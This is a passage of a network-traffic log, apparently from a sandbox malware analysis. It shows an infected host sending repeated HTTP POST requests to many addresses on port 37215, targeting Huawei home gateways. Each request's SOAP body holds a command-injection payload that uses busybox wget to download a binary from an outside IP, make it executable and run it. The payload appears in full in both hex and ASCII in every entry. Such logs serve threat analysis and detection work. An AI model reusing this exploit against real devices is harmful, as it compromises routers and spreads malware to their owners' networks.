78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1286192.168.2.1547732197.139.228.24937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730153084 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1287192.168.2.1549508197.72.3.16637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730186939 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1288192.168.2.1555914197.233.26.13737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730190039 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1289192.168.2.1550854197.47.34.637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730202913 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1290192.168.2.1552896197.236.250.15837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730207920 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1291192.168.2.1536872197.55.25.21837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730232954 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1292192.168.2.1547380197.154.97.21537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730254889 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1293192.168.2.1536546197.163.146.15537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730285883 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1294192.168.2.1550938197.173.230.17437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730303049 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1295192.168.2.1537974197.166.4.2637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730308056 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1296192.168.2.1559670197.106.101.13537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730336905 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
